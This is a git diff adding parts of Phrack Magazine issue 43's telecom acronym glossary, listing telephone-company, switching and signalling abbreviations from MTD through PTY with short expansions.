+MTD          Mutilated digit
+MTD          Mutilated digit (MDII)
+MTECS        Iimechanized toll error correction system phase ii
+MTECS        Mechanized toll error correction system
+MTEL         Main telephone
+MTF          Master test frame
+MTH          Magnetic tape handler
+MTIB         Metallic test interconnect bus
+MTIBAX       Metallic test interconnect bus access
+MTINT        Miscellaneous timer interrupt
+MTL          Maximum termination liability
+MTLR         Mechanized trouble log report
+MTLT         Maintance transmission action limit table
+MTM          Maintenance trunk module (NTI)
+MTO          Master terminal operator
+MTP          Management transitional program
+MTP          Message transfer part (SS7: q.701-q.710)
+MTP          Message transfer part.
+MTP          Message transfer protocol (x.411: p1)
+MTR          Manually test a response
+MTR          Mechanized time reporting
+MTR          Tape drive to read
+MTRS         Marketing or management time reporting system
+MTRS         Mechanized training records system
+MTRS/FCC     Management time reporting system/fcc report
+MTRT         Mate ready time out
+MTS          Manual test system
+MTS          Memory time swich     peb2040
+MTS          Message telecommunications service
+MTS          Message telecommunications system
+MTS          Message telephone service
+MTS          Message teleprocessing system
+MTS          Message toll service
+MTS          Mobile telephone service
+MTSC         MTS CMOS    (512 incoming channels)
+MTSDB        Message telecommunications services data base
+MTSI         Msg telecommunications ser price index
+MTSL         MTS large  (1024 incoming channels)
+MTSO         Mobile telephone switching office
+MTSS         MTS small   (256 incoming channels)
+MTTP         Master trunk test panel
+MTU          Magnetic tape unit parameters
+MTU          Maintenence termination unit
+MTU          Media tech unit
+MTW          Tape drive to write
+MTX          Mobile telephone exchange
+MU           Maintenance usage
+MU           Message unit
+MUC          Material usage code
+MULDEM       Multiplexer-demultiplexer
+MULT         Multiple
+MUM          Measured unit message
+MUNICH       Multichannel (32) network interface controller
+MUPH         Multiple position hunt
+MUSAC        Multipoint switching and conferencing unit
+MUSIC        Modeling for usage sensitive incremental costs
+MUT          Miniaturized universal trunk frame
+MUT          Multi-unit-test
+MUX          Multiplex
+MUX          Multiplexer
+MVAS         Motor vehicle accident summary
+MVCCW        Commstar ii call waiting USOC
+MVP          Multiline variety package
+MVS          Multiple virtual storage
+MVS          Multiple virtual storage operating
+MVS/MODS     TSO display operator messages from programs running under
+MVS/SP       Multiple virtual storages/system product operating system
+MVS/SPA      Multiple virtual storages/system product assist operating
+MVS/XA       Mutliple virtual storage/extended architecture
+MVT          Multiprogramming with a variable number of tasks
+MVTC         Motor vehicle type code
+MW           (ger) service word
+MW           Mandatory work
+MW           Multiwink
+MWCP         Mechanized wire centering program (BTL)
+MWI          Message waiting indicator
+MWPER        Write protect error
+MX           Monitor transmit (flow control bit in IOM2)
+MXU          Multiplex units
+MXU          Multiplexer unit
diff --git a/phrack43/24.txt b/phrack43/24.txt
new file mode 100644
index 0000000..72e6ed9
--- /dev/null
+++ b/phrack43/24.txt
@@ -0,0 +1,1237 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 24 of 27
+
+                              {Acronyms Part IV}
+
+N            Estimated time to complete this ticket.
+N            No corrective action
+N(R)         (NR) receive sequence number
+N(S)         (NS) transmit sequence number
+NA           CSACC link (EPSCS) INTER/TRA blocal 1-26
+NA           Next address
+NA           Normal alignment
+NAAP         New affirmative action program
+NAB          Network analysis bureau
+NAC          Network administration center
+NAC          Network application center
+NAC          Non-area code
+NACK         No ground acknowledgment received on a ground start private facility (FX) trunk
+NAFMAP       Network administration force management and productivity
+NAG          Network architecture group
+NAI          Telephone number assignment inquiry
+NAK          Negative acknowledge
+NAM          Number assignment module
+NAND         Not-and gate
+NANP         North american numbering plan
+NAP          Network access pricing
+NAP          Network analysis program (BTL)
+NAR          Nac assignment review
+NARS         National yellow pages services accounts receivable system
+NAS          Network analysis system
+NAS          Numerical and atmospheric sciences network
+NAS/CARS     Network analysis system/central analysis report system
+NAS/SRS      Network analysis system/subscriber recording system (MBT)
+NASS         Network adminstration support system
+NATL         National code (NTI)
+NAUG         Network administration user group
+NB           Narrow band
+NBSY         Number of busy (trunks) (NTI)
+NC           CNCC link (SPSCS) INTER/TRA blocal 1-26
+NC           Network channel
+NC           No circuit
+NCA          No circuit announcement
+NCAT         Network cost analysis tool
+NCC          National coordinating center (national emergency)
+NCC          Network control center
+NCC          Notify corrupted CRC (in EOC)
+NCCF         Network communication control facility (IBM vtam/mcp option)
+NCCF         Network communications control facility
+NCD          Network call denial
+NCDAFTA      NCD denied after answer
+NCDAFTA      Network call denial (NCD) denied after answer
+NCDBEFA      NCD denied before answer
+NCDBLKD      NCD returned blocked
+NCDCCBL      NCD code control blocked
+NCDDBOV      NCD data base overload
+NCDDBOV      NCD database overload
+NCDDENY      NCD deny received
+NCDDSBL      NCD direct signaling blocked
+NCDNOXL      NCD returned no translation
+NCDOVLD      NCD returned overload
+NCDUNEQ      NCD returned unequipped
+NCH          Noch
+NCI          Network channel interface
+NCI          No card issue
+NCLK         Network clock
+NCLS         Non-capitalized lease system
+NCMASTER     No circuit master
+NCOO         Network central office operations
+NCOS         Dms 100 class of service
+NCOSC        Network clock 2 oscillator
+NCOSS        Network communication and operations support system
+NCP          National control point
+NCP          Network control point
+NCP          Network control point (in a SDN)
+NCP          Network control program (IBM3725 software)
+NCR-         Sclrnetwork completion report-system called line report system
+NCRPAB       Network cost results plan
+NCS          National communications system
+NCS          National communicatons system
+NCSPC        Non-conforming stored program control
+NCT          Network control and timing
+NCT (CP)     Network control and timing call processing
+NCT LINKS    Network control and timing links
+NCTE         Digital network channel equipment
+NCTE         Network channel terminating equipment
+NCTE         Network channel terminating equipment (FCC NT1)
+NCTLNK       Network control and timing link
+NCU          Network control unit
+ND           Network data line INTER/TRA blocal 1-26
+NDA          Network data analyzer
+NDA          Network delivery access
+NDBS         Network data base system
+NDC          National destination code (i.e. area code)
+NDC          Network data collection
+NDC          Node data collection
+NDCC         Network data collection center
+NDIS         National dial-it services
+NDPCC        Network data processing coordination center
+NDRAS        Network distribution resource administration system
+NDS          Network data system
+NDS          Network distribution services
+NDS-TIDE     Network data system-traffic information distributor and
+NDS/ANN      Announcement system - System/36
+NDS/BMR      Bmrbudget morning report - System 36
+NDS/CONAD    Conadcontract administration system - System 36
+NDS/FLEXNDS  Flexible reporting
+NDS/FORMS    Mechanized forms - System 36
+NDS/MT       Mechanized tool interface - System 36
+NDS/PDB      Personnel database - System 36
+NDU          Network data unit
+NE           Near end
+NE           Network element
+NE           Network elements
+NEAS         Non-optional extended area service
+NEBE         Near end block error (IOM2 monitor message)
+NEBS         Network equipment-building system
+NEBS         Network equlpment-building system
+NEBS         New equipment-building system
+NECA         National exchange carrier association
+NECC         National emergency coordination center (bellcore)
+NEG          Negative
+NEON         Nonmanagement employee opportunity network
+NERC         National emergency relocation center
+NESAC        National electronic switching assistance center
+NESC         National electric safety code
+NET          (ec) european standards of telecommunication
+NETPARS      Network performance analysis reporting system (IBM Vtam)
+NETPRT       Netprt
+NETS         Nationwide emergency telecommunications system
+NETTIMS      Nettims
+NETWORK      Sidethe segment of the time slot interchanger (TSI) that is
+NEXT         Near end cross (x) talk
+NEXT         Near end crosstalk
+NEXT         Node exhaust tool system
+NFID         Non-fielded id
+NFM          Network force management
+NFS          Network file system
+NFT          Network file transfer
+NG           No good
+NGF          Number group frame
+NGF          Number group frame for 5 Cross Bar
+NHLS         Next higher level support
+NHR          Non hierarchial routing
+NHR          Not hard to reach
+NI           Network interface
+NI/NC        Network interface/network channel
+NID          Network in dialing
+NID          Network information database
+NIP          Nucleus initialization program
+NIPA         Net income and productivity analysis
+NIRS         National yellow pages services invoice receiving system
+NIS          Operation system-intelligent network elements
+NIS(FLEXCOM) Network interface system - OPS/INE
+NKP          No key pulse
+NKP          No key pulse (MDII)
+NL-PG        Line number page
+NLD          Nonlinear distortion
+NLD-SN       Nonlinear distortion signal/noise
+NLDM         Network logical data manager (IBM VTAM option)
+NLP          Network layer protocol
+NM           Network maintenance
+NM           Network management
+NM           Network management.
+NM           Network module
+NMA          Network management applique
+NMA          Network monitoring and analysis
+NMAT         Nonmanagement attendance tracking system
+NMB          Network management busy (NTI)
+NMC          Network management center
+NMC          Network mondule controller (NTI)
+NMDT         Network management display terminal (AT&T)
+NMMPEN       Network maintenance management planing
+NMOS         Network management operations support
+NMPR         Network management printer (AT&T)
+NMS          Network management services
+NMS          Network management system
+NN           Two digit number
+NNN          Three digit number
+NNNN         Four digit number
+NNX          Central office code designating the customer exchange
+NNX          Network numbering exchange
+NNX          Telephone exchange code
+NO           Number
+NOC          National operations center at Bedminister N.J.
+NOC          Network operations center
+NOC          Normalized office code
+NOCS         Network operations center system
+NOD          Network out dialing
+NODAL        Network operations forum
+NOE          Number of oes to be assigned
+NOL          Nac service order listing
+NOMAD        No-op instruction
+NOPS         Network operations plan system
+NOR/TADS     North region/testing and development system
+NORAD        North american air defense command
+NORGEN       Network operation report generating
+NORGEN       Network operations report generator
+NORGEN       Network operations report generator system
+NORM         Normal
+NORM         Return to normal (IOM2 monitor command/message)
+NOS          Network operating system
+NOTIS        Network operations trouble information system
+NOW          Network optical warehouse
+NP           Non-published
+NPA          Area code and exchange number
+NPA          Network peformance analyzer (IBM)
+NPA          No power alarm
+NPA          Numbering plan area (area code)
+NPAP         Nonmangement performance appraisal plan
+NPC          Network processor circuit
+NPC          No parameter choices
+NPDA         Network problem determination applicator (IBM)
+NPH          Network protocol handler
+NPM          Network performance monitoring system
+NPS          Network planning system
+NPSI         Ncp packet switching interface
+NPUMP        Normal pump
+NPV          Net present value
+NQ           Telegraph customized-service code for LATA access
+NR           No response.
+NRAS         Nova/rider awards system
+NRC          Non-recurring charge
+NRG          Number of rings
+NRM          Normal response mode (hscx)
+NRM          Normalizing ccs value
+NRODD        Non-redundant ODD
+NRRI         National regulatory research institute data
+NRRT         Non-reroutable traffic
+NRS          Network routing system (MBT)
+NRT          No response while in test mode.
+NRZ          Non return to zero
+NRZC         Nrz change
+NRZI         Nrz inverted
+NRZM         Nrz mark
+NSA          National security agency
+NSAC         Network service administration center
+NSACGCOMP    NS SCP ACG component
+NSBADRESP    NS SCP response message with invalid data
+NSC          Network service center
+NSCMP        Network service center multi (dddcservice bureau)
+NSCS         Network service center system
+NSD          No start dial
+NSD          Number summary display
+NSDB/IA      Network and service data base/interface administration
+NSE          Network switching engineering
+NSE          Noise
+NSEC         Network switching engineering center
+NSEP         National security emergency preparedness
+NSFNET       National science foundation network
+NSN          Network services node
+NSNONRTEMSG  NS reject message
+NSP          Network service part (SS7: SCCP+MTP)
+NSP          Non sent paid (coin)
+NSPEC        Node spec file
+NSPMP        Network service performance measurement plan
+NSPMP        Network switching performance measurement plan
+NSPRR        Network switching performance results report
+NSQRYFAIL    NS query fail
+NSS          Network support system
+NSSD         Network switched services district
+NSSNCOMP     NS SCP response message with a send notification
+NSSNCOMP     NS SCP response message with a send notification received at the switch
+NSTAC        National security telecommunications advisory committee
+NSTNMSG      NS termination notification message sent from the switch to the SCP
+NSTS         Network services test system
+NSU          Network support utilities
+NSs          Network system (i.e. DACS; SDACSL CDACSL OSU; CSU... etc)
+NStA         (Ger) PBX
+NT           Network termination
+NT           Northern telecom
+NT           Protection alarm-metalic-service code for LATA access
+NT/S         NT simulator     SIPB7020
+NT01         Network frame unable to switch off line after fault detection
+NT02         Network path trouble trunk to line - 1AESS network trouble
+NT03         Network path trouble line to line - 1AESS network trouble
+NT04         Network path trouble trunk to trunk - 1AESS network trouble
+NT06         Hourly report of network frames made busy - 1AESS network trouble
+NT1          NT serving layer 1 (NCTE)
+NT10         Network path failed to restore -1AESS network trouble
+NT2          NT serving layer 1 to 3 (subscriber interface of nt
+NTC          National trunk congestion
+NTD          Normal direction
+NTDACT       Network termination (NT) is deactivated.
+NTE          Network terminal equipment
+NTE          Network terminating equipment
+NTEC         Network technical equipment center
+NTEC         Network terminal equipment center
+NTEC         Networkbterminal equipment center
+NTI          Northern telcom inc.
+NTIA         National telecommunications and information agency
+NTM          Nt test mode (IOM2 monitor message)
+NTN          Number of tns to be assigned
+NTO          Network terminal option (IBM)
+NTOFN        NT off normal.
+NTP          Northern telecom practice (NTI)
+NTPWR        NT lost power.
+NTRAP        Network trouble analysis plan
+NTS          Network technical support
+NTS          Network test system
+NTT          No test trunk
+NTTMP        Network trunk transmission measurement plan
+NTWRK        Network
+NU           Protection alarm-service code for LATA access
+NUA          (international) network user address
+NUA          Network user address
+NUA          Network utilization analysis
+NUC          Nailed-up connection
+NUI          Network user identification
+NUL          Null
+NUP          National user part
+NV           Protective relaying/telegraph grade-service code for LATA access
+NVM          Non volatile memory (eeprom)
+NW           Telegraph grade facility-75 baud-service code for LATA access
+NWB          Network-busy (NTI)
+NWK          Adminnetwork administration budgets system
+NWM          Network management (NTI)
+NWPK         Network packs
+NXX          Refers to the central office designation of the telephone
+NY           Telegraph grade facility- 150 baud-service code for LATA access
+NYNEX        NYNEX corporation
+NYNEX        New york
+NYPS         National yellow pages services
+NYPSA        National yellow pages services association
+O            Priority.
+O+I          Originating plus incoming calls to a switching module.
+O-LTM        Optical line terminating multiplexer
+O/S          Operating system
+OA           Line equipment assignment option
+OA           Out of alignment
+OA&M         Operations
+OA&M         Operations administration and maintance
+OAM          Office data administration system
+OAP          Operator services position system administrative processor
+OASIS        Office automation strategy for information systems
+OASIS        Overseas accounting settlement and information
+OASYS        Office automation system
+OATQ         OSPS ANSI TCAP query and reply
+OATS         Operator assistance tracking system
+OBA          Out of band announcement
+OBF          Ordering and billing forum
+OBH          Office busy hour
+OBS          Observed data rate
+OC           Office communication
+OC           Operating company
+OC           Operator centralization
+OC&C         Other charges and credits
+OCAS         OSPS customer account services
+OCAS7        OSPS customer account services CCSS7/international CC validation
+OCC          Other common carrier
+OCC          Other common carriers
+OCC          Usage occupancy
+OCCH         Outgoing connections per circuit per hour
+OCCS         OSPS common channel signaling
+OCCS         Order control and coordination system (BTL)
+OCE          Other common carrier channel equipment
+OCN          Operating company number
+OCOIN        OSPS coin
+OCP          Optional calling plan
+OCP          Origination point code (SS7)
+OCPDG        Ocp data gathering
+OCR          Optical character reader (auerbach computer technology report)
+OCR          Optical character recognition (IBM)
+OCRS         Optical character recognition system
+OCS          Offical communication services
+OCS          Old class of service
+OCS/CTS      Official communications services installation and
+OCS/CTS      Official communications services installation and maintenance cos
+OCSDSELR     OCS data station equipment location report
+OCSOLRM      Official communications services (OCS) on-line reference
+OCTD         OSPS centralized automatic message accounting tone decoder
+OCU          Office channel unit
+ODA          Office data administration
+ODA          Office data assembler
+ODA          Office document architecture
+ODAC         Operations distribution administration center
+ODACCIN      OSPS directory assistance (DA) call completion and intercept
+ODB          On-demand B-channel counts.
+ODB          Operations divestiture board
+ODCS         Official data communications service
+ODD          Office dependent data
+ODD          Operator distance dialing
+ODDBU        Office dependent data backup
+ODDD         Operator direct distance dialing
+ODDS         Order data distribution system
+ODIN         Online data integrity system
+ODP          Office dialing plan
+ODP          Organization development program
+ODP          Organizational design program
+ODS          Overhead data stream
+ODS          Tnds on-line demand servicing
+OE           Office equipment
+OE           Office equipment / office equipment number
+OE           Office equpiment number
+OEC          Other exchange carrier
+OEC          Outside plant equivalence codes
+OEIC         Optoelectronic integrated circiut
+OEIS         OSPS external information system
+OEM          Original equipment manufacture
+OEM          Original equipment manufacturer
+OF           Official (telco owned)
+OF           Overflow
+OFA          OSPS facility administration
+OFC          Office
+OFF          OSPS fast features
+OFF HK       Off hook
+OFFN         Off-normal
+OFL          Overflow(s)
+OFNPS        Outstate facility network planning system
+OFRD         Offered (calls [peg count])(NTI)
+OFRT         Office route (NTI)
+OFT          Optical fiber tube
+OGO          Outgoing only trunk
+OGT          Outgoing trunk
+OI           Off premises intercommunication station line INTER/TRA blocal 1-2
+OI           Optical interface
+OIJ          Orders in jeopardy
+OINTA        OSPS interflow listing services/C-ACD measures
+OIRCV        OSPS interflow T&A calls received
+OISNT        OSPS interflow T&A calls sent
+OKMDT        Oklahoma management development training
+OKP          Operational kernel process
+OKRA         Operator keyed trouble report
+OLCP         Optional local calling plan
+OLIDB        OSPS line information data base
+OLIPD        Online invoice payment data
+OLRM         Online reference material
+OLS          Originating line screening
+OLTEP        Online test executive program
+OLTS         Optical loss test set
+OM           Operational measurement (NTI)
+OM           Operational measurements
+OM           Output mux
+OMAP         Operations and maintanance application part
+OMAT         Operations maintenance and administration team
+OMC          Operating and maintainance center
+OMD          Out messages - day
+OMDB         Output message data base
+OMDB         Output message database
+OMISC        OSPS miscellaneous call
+OML          Outgoing matching loss
+OMM          Output message manual
+OMNI         Online marketing networked information system
+OMP          SS7 fe operation management protocol
+OMPF         Operation and maintenance processor frame
+ON           Off network access line INTER/TRA blocal 1-26
+ON HK        On hook
+ONA          Open network architecture
+ONA          Open network architecture (FCC computer inquiry iii)
+ONAC         Operations network administration center in K.C. (AT&T)
+ONAL         Off network access line
+ONALS        Off-net access lines
+ONC          On line COSMOS
+ONDDBOV      OSPS NCD message received indicating database overload
+ONDDBUN      OSPS NCD message returned data base unable to process
+ONDGMSG      OSPS NCD message received garbled
+ONDIRPY      OSPS NCD message received with an inconsistent reply
+ONDNBLK      OSPS NCD message returned because of network blockage
+ONDNCON      OSPS NCD message returned because of network congestion
+ONDNRTE      OSPS NCD message returned because of no routing data
+ONDTOUT      OSPS NCD message returned because of timeout
+ONDUNEQ      OSPS NCD message returned
+ONDURPY      OSPS NCD message received with an unexpected reply
+ONI          Operator number identification
+ONP          Open network provision
+ONPA         Originating numbering plan area
+ONS          On line switch
+ONSITE       Urban decisions system
+ONTC         Office network and timing complex
+ONTC         Office network and timing complex (CM2 offices only)
+ONTCCOM      Office network and timing common units
+OOB          Out-of-band
+OOC          Originating office code
+OOC          Out-of-chain
+OOF          Out-of-frame
+OP           Off premises extension INTER/TRA blocal 1-26
+OP           Operation
+OP           Outside plant
+OP ALL       Option all
+OPC          Originating point code
+OPC          Originating point codes
+OPCDB        Operations common database
+OPDU         Operations protocol data unit (x.411: p3)
+OPEOS        Outside plant planning
+OPH          Operator handled
+OPM          Outage performance monitoring
+OPM          Outside plant module
+OPN          Open-of-day report
+OPNOXL3      OSPS position no level 3 protocol.
+OPR          Operator
+OPS          Off-premises station
+OPS          Outside plant study system
+OPSM         Outside plant subscriber module
+OPT          Optional
+OPU          Outside plant cable usage
+OPX          Off-premises extension
+OR           Originating register
+OR & RG      Operating rate and route guide
+ORB          Office repeater bay
+ORBIT        Osp rehabilitation budget information tracker
+ORC          Originating rate center
+ORD          Service or work order
+ORD          Work order
+ORD#         Order number
+ORDN         Order number.
+ORDNO        Service order number
+ORE          Order edit
+ORE-G        Order edit global
+ORI          Order input
+ORIG         Allows originating
+ORLF         Originating register link frame
+ORLMF        Originating register line memory frame
+ORM          Optical remote module
+ORM          Optical remote switching module
+ORM          Optically remote switching module
+ORMC         Originating register marker connector
+ORP          Operational review plan
+ORR          Overflow reroute
+ORRS         Online records and reporting system (TNDS)
+ORS          Order send
+ORTN         Orientation
+ORTR         OSPS real-time rating
+OS           Off premises PBX station line INTER/TRA blocal 1-26
+OS           Operations systems (operations support systems) (OSS)
+OS           Operator service
+OS           Origination scanning
+OS           Out of service
+OS           Out sender
+OS           Outstate
+OS/D         Operator services/deaf
+OSAC         Operator services assistance center
+OSAC         Operator services of answer consistency
+OSAM         Overflow sequential access method (IBM)
+OSAP         Operations systems architecture plan
+OSC          Operator services center
+OSC          Oscillator
+OSCAS        Operator service control access system
+OSDS         Operating system for distributed switching
+OSDS-C       Operating system for distributed switching in the conection
+OSDS-M       Operating system for distributed in the switching module.
+OSE          Oscillator error flip-flop
+OSI          Open system interconnection
+OSI          Open systems interconnection
+OSLF         Out sender link frame
+OSM1         Optional services menu screen number 1
+OSN          Operations systems network
+OSO          Originating screening office
+OSO          Originating signaling office
+OSPE         Outside plant engineer
+OSPI         Operator services planning information
+OSPRE/CON    Outside plant reconciliation
+OSPS         Operator service position system
+OSPS         Operator services position system
+OSPS         Outside plant studies
+OSPS-DL      OSPSystem data links
+OSR          Ongoing support request
+OSS          Operation support system
+OSS          Operations support system
+OSS          Operations support system (BTL)
+OSS          Operator service signalling
+OSS          Operator services system
+OSSGR        Operator services system generic requirements
+OSSP         Operations systems strategic plan
+OSSS         Operator services support system
+OSTC         Operations systems technical center
+OT           Originating traffic
+OT           Other type
+OT           Overtime
+OTA          OSPS toll and assistance
+OTC          Operating telephone company (in bell system)
+OTDR         Optical time domain reflectometers
+OTER         Operator team efficiency ratio
+OTG          Outgoing trunk group
+OTH          Other
+OTO          Office-to-office
+OTR          Operational trouble report
+OTSS         Off the shelf system
+OTTS         Outgoing trunk transmission system
+OUC          Orgination unit code
+OUT          Outgoing trunk groups
+OUTWATS      Outward wats
+OUTWATS      Outward wide area telecommunications service
+OVF          Overflow (NTI)
+OVLT         Overvoltage protection
+OVLY         Overlay scheduling
+OVOEQ        OSPS call volume and equipment usage
+OVRLD        Overload or congestion control
+OVRRNG       Overrange
+OVS          Overseas
+OVW          Equipment class overwrite
+OW           Over-write
+OWG          Optical wave guide
+OWT          Outwats [code 024(5500-5600)]
+OXPRESS      Zero express
+P            Commitment time for having this trouble repaired.
+P-tone       Pseudo tone
+P/AR         Peak-to-average ratio
+P/F          Poll/final bit
+PA           Power allarm
+PA           Program address
+PA           Program application
+PA           Protective alarm (AC) INTER/TRA blocal 1-26
+PABX         Private automatic branch echange
+PABX         Private automatic branch exchange
+PAC          Percent access chargeable
+PACE         Program for arrangement of cables and equipment
+PACK         Peripheral equipment packs
+PACT         Prefix access code translator
+PAD          Packet assembler/dissasembler
+PADDLE       Program for administering data bases in the lfacs
+PADS         Planning analysis and decision support
+PADSX        Partially automated digital signal cross-connect
+PAK          Work packages
+PAL          Pre-service action limit
+PAL          Price analysis list
+PAL          Pricing and loading (mcauto)
+PAL          Purchasing authorization letter
+PAM          Pass along method (SS7: in ISUP)
+PAM          Primary access method
+PAM          Pulse amplitude modulation
+PAN          Panel
+PAN          Personal account number
+PANDS        Purchase & sales
+PANS         Pretty advanced new stuff
+PAP          Publications' accounts payable
+PAQS-10      Provisioning and quotation system
+PARMS        Parameters
+PARTS        Tvcom electronic parts inventory
+PAS          Protocol architecture specification for IOS (PCT)
+PAS          Public announcement service
+PAT          Position attached signal time-out
+PAT          Position attached signal time-out (MDII)
+PAT          Power alarm test
+PATROL       Old version of 'esscoer'
+PAX          Private automatic exchange
+PAYRO1IC     Payroll-information center
+PB           Lajga
+PB           Placement bureau
+PB           Sdga
+PBC          Peripheral board controller
+PBC          Peripheral bus computer
+PBC          Peripheral bus. computer
+PBC          Processor bus controller
+PBD          Pacific bell directory
+PBG          Packet business group
+PBHC         Peak busy hour calls
+PBM          LTG = 0 ho/mo msg reg (no ANI)
+PBO          Paperless business office
+PBOD         Pac bell order dist.
+PBVS         Pacific bell verification system
+PBX          Private branch exchange
+PBXC         Private branch exchange center
+PBXWL        Private branch exchange wiring list
+PC           Peg count
+PC           Peripheral control (software)
+PC           Power controller
+PC           Primary center
+PC           Process controller
+PC           Switched digital-access line INTER/TRA blocal 1-26
+PCA          Philip crosby associates
+PCB          Program communications block-IMS (IBM)
+PCC          Peg count converters
+PCDA         Program controlled data acquisition
+PCF-II       Programming control facility-II (IBM)
+PCH          Parallel channel
+PCI          Panel call indicator
+PCID         Primary circuit identification
+PCL          Payroll change list
+PCL          Pcm data clock
+PCM          Program control module
+PCM          Pulse code modulation
+PCN          Personal communication network (UK)
+PCN          Product change notices
+PCO          Peg count and overflow
+PCO          Plant control office
+PCP          Primary control program
+PCR          Preventive cyclic retransmission (SS7 in MTP)
+PCSN         Public circuit switched network
+PCT          IOS program coding tools (SDL oriented)
+PCTF         Per-call test failure
+PCTF         Per-call test failure.
+PCTV         Program controlled transverters
+PD           Peripheral decoder
+PDA          Parameteredatanassembler
+PDA          Partial dial abandon
+PDA          Partial dial abandon (MDII)
+PDC          Primary digital carrier
+PDF          Power distribution frame
+PDI          Power and data interface
+PDIT         Prefix/feature digit interpreter
+PDM          Power down mode
+PDN          Public data network
+PDSP         Peripheral data storage processor
+PDT          Partial dial time-out
+PDT          Partial dial time-out (MDII)
+PDU          Protocol data unit (x.400)
+PE           Peripheral equipment
+PE           Program audio 200-3500 hz-service code for LATA access
+PECC         Product engineering control center
+PEP          Position establishment for parties
+PER          For each.. or according to
+PER          Protocol error record
+PF           Printout follows
+PF           Program audio 100-5000 hz-service code for LATA access
+PFM          Pulse frequency modulation
+PFOFF        Power feed off (C/I channel code)
+PFPU         Processor frame power unit
+PFR          Party line fill report
+PFR          Polarity failure
+PFR          Polarity failure (MDII)
+PFS          Page format selection (teletex)
+PFS          Pcm frame synchronisation signal
+PG           Page
+PG           Paging INTER/TRA blocal 1-26
+PG           Program document index
+PG           Program frequency weighting
+PGTC         Pair gain test controller
+PH           Packet handler
+PH           Parity high bit
+PH           Pending header
+PH           Protocol handler
+PH JTR       Phase jitter
+PH-          Physical-
+PHY          Physical
+PIA          Plug-in administrator
+PIC          PCM interface controller
+PIC          Plastic-insulated cable (plant)
+PIC          Polyolefin insulated cables (plant)
+PIC          Primary independent carrier (switching)
+PICB         Peripheral interface control bus
+PICS         Plug-in inventory control system
+PICS         Plug-in inventory control system (PICS/DCPR)
+PICS/DCPR    PICS/detailed continuing property records
+PID          Personal ID
+PIDB         Peripheral interface data bus
+PIINT        Allow packet interface interrupt
+PIN          Personal identification number
+PIOCS        Physical i/o system
+PIP          PCM interface port
+PIP          Packet interface port
+PIU          PCM interface unit
+PJ           Program audio 50-8000 hz-service code for LATA access
+PK           Program audio 50-15000 hz-service code for LATA access
+PKC          Package category
+PKT          Package type
+PL           Parity low bit
+PL           Private line
+PL           Private line circuit number
+PL           Private line-voice INTER/TRA blocal 1-26
+PLAR         Private line automatic ringdown
+PLC          Physical link control (IOS)
+PLD          Partial line down (teletex)
+PLGUP        Plug-up (currently no affect).
+PLIC         Pcm line interface
+PLL          Phase locked loop
+PLU          Partial line up (teletex)
+PM           Peripheral module
+PM           Peripheral modules
+PM           Phase modulation
+PM           Plant management
+PM           Preventive maintenance
+PM           Protective monitoring INTER/TRA blocal 1-26
+PM01         Daily report - 1AESS plant measurments
+PM02         Monthly report - 1AESS plant measurments
+PM03         Response to a request for a specific section of report - 1AESS
+PM04         Daily summary of iC/Iec irregularities - 1AESS plant measurments
+PMAC         Peripheral module access controller
+PMB          LTG = 1 ho/mo regular ANI6
+PMI          Plant managementninstruction
+PMS          Peripheral maintenance system pack
+PMS          Peripheral maintenance system packs
+PMS          Plant measurements system
+PMS HUB      Picture phone meeting service hub
+PMU          Precision measurement unit
+PN           Pseudo noise (code)
+PNB          Pacific northwest bell
+PNL          Premis number list for TN
+PNP          Private numbering plan (i.255 b)
+PNPN         Positive-negative-positive-negative devices
+POB          Periphal order buffer
+POF          Programmable operator facility
+POP          Point of presence
+PORT         Remote access test ports
+POS          Centralized automatic message accounting positions (NTI)
+POS          Position
+POS          TOPS (DMS) position (NTI)
+POSN-P       Posn-p
+POSNOB       OSPS position no B-channel.
+POSNRSP      OSPS position no response.
+POT          Point of termination
+POTS         Plain old telephone service
+POVT         Provisioning on-site verification testing
+PP           Post pay
+PPC          Pump peripheral controller
+PPD          Peripheral pulse distributor
+PPG          Precedence and preemption group
+PPM          Periodic pulse metering.
+PPN          Public packet switching
+PPS          Product performance surveys
+PPS          Public packet switching network
+PPS          Pulse per second
+PPSN         Public packet switched network
+PPSRV        Pre-post service.
+PPU          Power providing unit
+PP_D_M       Point-to-point data maintenance
+PQ           Program grade customized-service code for LATA access
+PR           Cable pair id
+PR           Pair normally tip and ring
+PR           Protective relaying-voice grade INTER/TRA blocal 1-26
+PRA          Primary rate access
+PRCA         Puerto rico communications authority
+PRE          Previous
+PREMIS       Premises information system
+PRFX         Prefix
+PRFX         Prefix translations
+PRI          Frame priority
+PRI          Primary rate interface
+PROC         Processor
+PROG         Program
+PROM         Programmable read-only memory
+PROMATS      Programmable magnetic tape system
+PROT         Protection
+PROTEL       Procedure oriented type enforcing language
+PROTO        Protocol circuit
+PRP          Periodic purging of remarks
+PRP          Permanent cable pair remarks
+PRS          Personal response system
+PRT          Print
+PRTC         Puerto rico telephone company
+PRZ          Preferred rate zone
+PS           Msc constructed spare facility INTER/TRA blocal 1-26
+PS           Packet switching
+PS           Previously published/non-published facility indicator
+PS           Program store
+PSAP         Public safety answering point
+PSC          Prime service contractor
+PSC          Public safety calling system
+PSC          Public service commission
+PSD          Programmable scanner distribution
+PSDC         Public switched digital capability
+PSDN         Packed-switched data network (t.70)
+PSDS         Public switched digital service
+PSE          Packet switch exchange
+PSF          Packet switching facility
+PSGRP        Packet switching groups
+PSHF         Peripheral equipment shelf
+PSIU         Packet switch interface unit
+PSK          Phase shift keying
+PSK          Phase-shift keying
+PSL          IOS protocol source library
+PSM          Packet service module
+PSM          Position switching module
+PSN          Packet switched network
+PSN          Public switched network
+PSO          Pending service order
+PSODB        Packet switching on-demand B-channel
+PSOFC        Packet switching office (ISDN)
+PSPDN        Packed-switched public data network
+PSPH         Packet switching PH/DSLG (ISDN)
+PSPORT       packet switching protocol handler (PH) port (ISDN)
+PSR          Phase shift register
+PSS          Packet switch stream
+PSS          Packet switched services
+PSSM         Packet switching per switching module (ISDN)
+PST          Permanent signal time-out
+PST          Permanent signal time-out (MDII)
+PST          Pre-service testing
+PST          Sides protocol software development
+PSTG         Packet switching trunk group
+PSTLT        Pre-service transmission action limit table
+PSTN         Public switched telephone network
+PSTN         Public switched telephone network (t.70)
+PSU          Packet switch unit
+PSU          Packet switch unit.
+PSU          Program storage unit
+PSUPH        Packet switch unit protocol handler
+PSW          Program status word
+PSWD         Password access
+PT           Package time
+PT           Point
+PT           Program timer
+PTAT         Private trans atlantic telecommunications
+PTCL         Protocol
+PTD          Plant test date
+PTR          Printer
+PTT          Postal telephone and telegraph
+PTW          Primary translation word
+PTY          Party indicator
+PTY          Party number or position
